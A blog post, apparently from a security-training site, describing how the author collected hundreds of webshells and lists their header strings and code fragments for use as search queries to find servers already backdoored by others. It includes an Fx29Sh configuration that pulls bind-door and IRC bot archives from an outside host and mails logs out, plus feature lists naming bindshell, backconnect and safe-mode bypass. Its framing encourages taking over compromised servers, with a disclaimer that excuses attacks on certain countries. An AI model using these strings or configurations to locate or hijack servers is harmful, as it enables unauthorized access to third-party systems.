*FOR RESEARCH* How Easy is it to find Webshells and basically have Root/Admin or User Level Access without “Hacking” Anything – PART 1


Acronis Cyber Protect

********RESEARCH ONLY – DO NOT TRY ANYTHING I AM ABOUT TO DO AS YOU WILL MOST LIKELY END UP IN JAIL, I DO NOT ENDORSE NOR CONDONE DoS ATTACKS OR HACKING WEBSERVERS YOU DO NOT HAVE PERMISSION TO DO SO – HOWEVER IF THEY ARE AGAINST IRAN OR NORTH KOREA I WOULD LOOK THE OTHER WAY – I TAKE IN NO WAY RESPONSIBILITY FOR ANYTHING ILLEGAL YOU ARE ABLE TO DO WITH THIS INFORMATION *******

Like my webshell phpDOS mainly focused botnet which I built in a matter of minutes, I wondered if I could take over servers that other hackers had already broken into and backdoored without protecting. So, to start my research I decided to locate as many underground and publically available webshells and backdoors as I could, that was far too easy to do first off, in about 30 minutes I had over 500 different webshells scripts to play with. I loaded them all on my dedicated server to test them out, see what they would look like in a live dump, wrote some snort rules for certain execution patterns. Now the fun part, lets try something simple…..like grabbing the heads from a few of the files that the moron coders forgot to include for Google to not index their backdoors.

So here are a few of some of the strings that I began searching for:

################################

Php Backdoor v 1.0 by ^Jerem

################################

This backdoor coded in php allows

allows to control a web serv …

For use this script upload this

on the ftp server of the hacked

web site. Enjoy ^^

/**********************************************************/

/*                          CrystalShell v.1

/*                       ——— ———-

/*

/*       Coded by : Super-Crystal and Mohajer22

/*    ————————————————

/*    Arab Security Center Team <—thanks

/*      mail : sup3r-hackers@hotmail.Com

/* october73 shell & CrystalShell < coding by super crystal

/*

/*********************************************************/

<meta http-equiv=”Content-Type” content=”text/html; charset=windows-1256″><meta http-equiv=”Content-Language” content=”ar-sa”><title>

Crystal shell</title>

/*

DDDDD        SSSSS    DxShell    by î_Î Tync

D  D  X X   S

D  D   X    SSSSS    http://hellknights.void.ru/

D  D  X X       S    ICQ#244648

DDDDD        SSSSS

*/

$GLOB[‘SHELL’][‘Ver’]=’1.0b’; /* ver of the shell */

$GLOB[‘SHELL’][‘Date’]=’26.04.2006′;

#######################################

## FaTaLisTiCz_Fx Fx29Sh 2.0.09.08   ##

define(‘sh_ver’,”2.0.09.08″);        ##

## By FaTaLisTiCz_Fx                 ##

## © 03-09 2008 FeeLCoMz Community   ##

## Written under PHP 5.2.5           ##

#######################################

$sh_name = sh_name();                ##

#######################################

#$sh_mainurl        = “http://vidinas.net/templates/archzone/xml/cyberz.txt”;

$sh_mainurl        = “http://vidinas.net/templates/archzone/xml/”;

$fx29sh_updateurl  = $sh_mainurl.”fx29sh_update.php”;

$fx29sh_sourcesurl = $sh_mainurl.”fx29sh.txt”;

$sh_sourcez = array(

“Fx29Sh”   => array($sh_mainurl.”cyberz.txt”,”fx29sh.php”),

“psyBNC”   => array($sh_mainurl.”fx.tgz”,”fx.tgz”),

“Eggdrop”  => array($sh_mainurl.”fxb.tgz”,”fxb.tgz”),

“BindDoor” => array($sh_mainurl.”bind.tgz”,”bind.tgz”),

);

##[ AUTHENTICATION ]##

$auth = array(

“login”     => “”,

“pass”      => “”,

“md5pass”   => “”,

“hostallow” => array(“*”),

“denied”    => “<a href=\”$sh_mainurl\”>”.$sh_name.”</a>: access denied!”,

);

##[ END AUTHENTICATION ]##

$curdir = “./”;

$tmpdir = “”;

$tmpdir_logs = “./”;

$log_email = “meister_onthelaw@yahoo.com”;

$sess_cookie = “fx29shcook”;

$sort_default = “0a”; #Pengurutan, 0 – nomor kolom. “a”scending atau “d”escending

$sort_save = TRUE; #Simpan posisi pengurutan menggunakan cookies.

$usefsbuff = TRUE;

$copy_unset = FALSE; #Hapus file yg telah di-copy setelah dipaste

* <p>Title:JspWebshell </p>

*

* <p>Description: jspÍøÕ¾¹ÜÀí</p>

*

* <p>Copyright:¾ø¶ÔÁã¶È[B.C.T] Copyright (c) 2006</p>

*

* <p>Company: zero.cnbct.org</p>

*  PS:±¾³ÌÐòÊÇСµÜ´¦ÓÚÐËȤËùд£¬ÈçÓÐÒÉÎÊÇëÁªÏµQQ:48124012

* @version 1.2

*/

/+——————————–+\

|            KA_uShell           |

|    <KAdot Universal Shell>     |

|         Version 0.1.6          |

|            13.03.04            |

|  Author: KAdot <KAdot@ngs.ru>  |

|——————————–|

\+                                +/

–>

<title>KA_uShell 0.1.6</title>

<style type=”text/css”>

/*

* MySQL Web Interface Version 0.8

* ——————————-

* Developed By SooMin Kim (smkim@popeye.snu.ac.kr)

* License : GNU Public License (GPL)

* Homepage : http://popeye.snu.ac.kr/~smkim/mysql

*/

$HOSTNAME = “localhost”;

function logon() {

global $PHP_SELF;

setcookie( “mysql_web_admin_username” );

setcookie( “mysql_web_admin_password” );

echo “<html>\n”;

echo “<head>\n”;

echo “<title>MySQL Web Interface</title>\n”;

echo “</head>\n”;

echo “<body>\n”;

echo “<table width=100% height=100%><tr><td><center>\n”;

echo “<table cellpadding=2><tr><td bgcolor=#a4a260><center>\n”;

echo “<table cellpadding=20><tr><td bgcolor=#ffffff><center>\n”;

echo “<h1>MySQL Web Interface</h1>\n”;

echo “<form action=’$PHP_SELF’>\n”;

echo “<input type=hidden name=action value=logon_submit>\n”;

echo “<table cellpadding=5 cellspacing=1>\n”;

echo “<tr><td>Username </td><td> <input type=text

name=username></td></tr>\n”;

echo “<tr><td>Password </td><td> <input type=password

name=password></td></tr>\n”;

echo “</table><p>\n”;

echo “<input type=submit value=’Enter’>\n”;

echo “<input type=reset value=’Clear’><br>\n”;

echo “</form>\n”;

echo “</center></td></tr></table>\n”;

echo “</center></td></tr></table>\n”;

echo “<p><hr width=300>\n”;

echo “<font size=2>\n”;

echo “Copyleft &copy; since 1999,\n”;

echo “<a href=’mailto:smkim76@icqmail.com’>SooMin Kim</a><br>\n”;

echo “<a href=’http://popeye.snu.ac.kr/~smkim/mysql’>Hompage<a> is

##########################################################

# Small PHP Web Shell by ZaCo (c) 2004-2006                #

#  +POST method                                            #

#  +MySQL Client+Dumper for DB  and tables                 #

#  +PHP eval in text format and html for phpinfo() example #

# PREVED: sn0w, Zadoxlik, Rebz, SkvoznoY, PinkPanther      #

# For antichat.ru and cup.su friends usage                 #

# All bugs -> mailo:zaco@yandex.ru                         #

# Just for fun 🙂                                          #

##########################################################

<title>Sosyete Safe Mode Bypass Shell – Edited By KingDefacer</title>

#/\/\/\/\/\  MulCiShell v0.2 – Edited By KingDefacer/\/\/\/\/\/\/\#

# Updates from version 1.0#

# 1) Fixed MySQL insert function

# 2) Fixed trailing dirs

# 3) Fixed file-editing when set to 777

# 4) Removed mail function (who needs it?)

# 5) Re-wrote & improved interface

# 6) Added actions to entire directories

# 7) Added config+forum finder

# 8) Added MySQL dump function

# 9) Added DB+table creation, DB drop, table delete, and column+table count

# 10) Updated security-info feature to include more useful details

# 11) _Greatly_ Improved file browsing and handling

# 12) Added banner

# 13) Added DB-Parser and locator

# 14) Added enumeration function

# 15) Added common functions for bypassing security restrictions

# 16) Added bindshell & backconnect (needs testing)

# 17) Improved command execution (alts)

*****************************************************************************************************************

*                           Safe0ver Shell – Safe Mod Bypass By Evilc0der – Edited By KingDefacer               *

*****************************************************************************************************************

*****************************************************************************************************************

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

!!   Dikkat ! Script Egitim Amacli Yazilmistir.Scripti Kullanarak Yapacaginiz Illegal eylemlerden sorumlu Degiliz.

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

error_reporting(0);

$PHPVer=phpversion();

$isGoodver=(intval($PHPVer[0])>=4);

$scriptTitle = “Safe0ver”;

$scriptident = “$scriptTitle By Evilc0der.com”;

<title>s72 Shell v1.0 Codinf by Cr@zy_King</title>

<font color=”#00FF00″>Cr@zy_King&nbsp; </font>

Ru24PostWebShell

Writed by DreAmeRz

http://www.ru24-team.net

<title>Ru24PostWebShell – “.$_POST[‘cmd’].”</title>

Default Changes

– – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – –

$owner        = “SR-Crew”;                                                     Insert your nick

$version      = “2.0.0”;                                                        The version

|  _ \ ___   ___ | |_      / ___|| |__   ___| | |

| |_) / _ \ / _ \| __|     \___ \| ‘_ \ / _ \ | |

|  _ < (_) | (_) | |_   _   ___) | | | |  __/ | |

|_| \_\___/ \___/ \__| (_) |____/|_| |_|\___|_|_|</pre>

Script:

-=–=–=–=–=–=–=–=–=–=–=–=–=–=–=–=–=–=–=–=–=–=–=–=–=-

Name: PHPJackal

Version: 1.5

Author:

-=–=–=–=–=–=–=–=–=–=–=–=–=–=–=–=–=–=–=–=–=–=–=–=–=-

Name: NetJackal

Country: Iran

Website: http://netjackal.by.ru

Email: nima_501@yahoo.com

PHPJackal v1.5 – Powered By NetJackal

<!–  http://michaeldaw.org 2006 –>

/*###########################################

Shell

Bu Shell kodlarin derlemesi Megabros tarafindan yapilmistir..

Yapimci Ve derleyeN : Megabros

###########################################*/

*

* lostDC shell

* PHP Shell scritta da lostpassword, D3vilc0de crew

* Rilasciata sotto licenza GPL 2009/2010

* Data rilascio: 25/12/2009 (eh si, il giorno di natale non avevo niente da fare)

* La Shell presenta varie funzioni, ma rimane comunque in continuo aggiornamento

*

error_reporting(0);

Loader’z WEB Shell v 0.1.0.2 {15 àâãóñòà 2005}

Âîò êàêèå îí ïîääåðæèâàåò ôóíêöèè.

– Ðàáîòà ñ ôàéëîâîé ñèñòåìîé ñ ïîìîùüþ PHP.  óäîáíîé òàáëèöå ïðåäñòàâëåíî ñîäåðæèìîå òåêóùåé ïàêè (äîáàâëåíèå â ýòîé âåðñèè, íîðìàëüíûé âèä ïðàâ, à íå ÷èñëî :)).

– Âûïîëíåíèå êîäà, ïõï ðóëèò 😉

Kodlama by BLaSTER

from TurkGuvenligi

* iMHaPFTP.php – iMHaBiRLiGi Php Ftp Editoru

* Copyright (C) 2003-2005  iMHaBiRLiGi <iMHaBiRLiGi@imhabirligi.com>

*

* Bu Kod Tamamiyle Özgür Yazilimdir.

* Kötü Amaclar ile kullanilmamak sartiyla istenildigi gibi Kullanilabilir

* Programin amaci ftp olmadan hostunuza baglanti kurup

* Dosya ekleyip kaldira bilmektir.

* Kodumuz 6 Dilde yazilmistir.Server Diline Göre Otomatik Secim Yapar.

<title>h4ntu shell [powered by tsoi]</title>

This Is The Server Information

echo “<title>Edited By KingDefacer</title><body>”;

*************************

*  ###### ##### ######  *

*  ###### ##### ######  *

*  ##     ##    ##      *

*  ##     ####  ######  *

*  ##  ## ####  ######  *

*  ##  ## ##        ##  *

*  ###### ##    ######  *

*  ###### ##    ######  *

*                       *

* Group Freedom Search! *

*************************

GFS Web-Shell

FaTaLisTiCz_Fx Fx29SheLL v2.0.09.08

.: No System is Perfectly Safe :.

‘ Tac gia: forever5pi (theo huong dan cua anh vicki-vkdt)

‘ Email : forever5pi@yahoo.com

‘ Website: http://vnhacker.org

option explicit

/***************************************************************************

*                           Cyber Shell (v 1.0)

*                            ——————-

*   copyright            : (C) Cyber Lords, 2002-2006

*   email                : pixcher@mail.ru

*

*   http://www.cyberlords.net

*

*   Coded by Pixcher

*   Lite version of php web shell

***************************************************************************/

<title>Aria cPanel cracker version 1.0 – Edited By KingDefacer</title>

# Edited By KingDefacer

‘ ——————–o0o——————–

‘ File: CmdAsp.asp

‘ Author: Maceo <maceo @ dogmile.com>

‘ Release: 2000-12-01

‘ OS: Windows 2000, 4.0 NT

‘ ——————————————-

‘ — check for a command that we have posted — ‘

str_replace(‘.’,”,’P.h.p.S.p.y’)

http://www.alturks.com str_replace(‘.’,”,’P.h.p.S.p.y’);?> Ver: 2008

<a href=”javascript:goaction(‘logout’);”>Logout</a> |

<a href=”javascript:goaction(‘file’);”>File Manager</a> |

<a href=”javascript:goaction(‘sqladmin’);”>MySQL Manager</a> |

<a href=”javascript:goaction(‘sqlfile’);”>MySQL Upload &amp; Download</a> |

<a href=”javascript:goaction(‘shell’);”>Execute Command</a> |

See part 2 for results…..

http://www.computersecurity.org/cyber-security-training-learning-videos/web-application-attacks-website-app-attack/webshells/for-research-how-easy-is-it-to-find-webshells-and-basically-have-rootadmin-or-user-level-access-without-hacking-anything-part-2/



Leave a Comment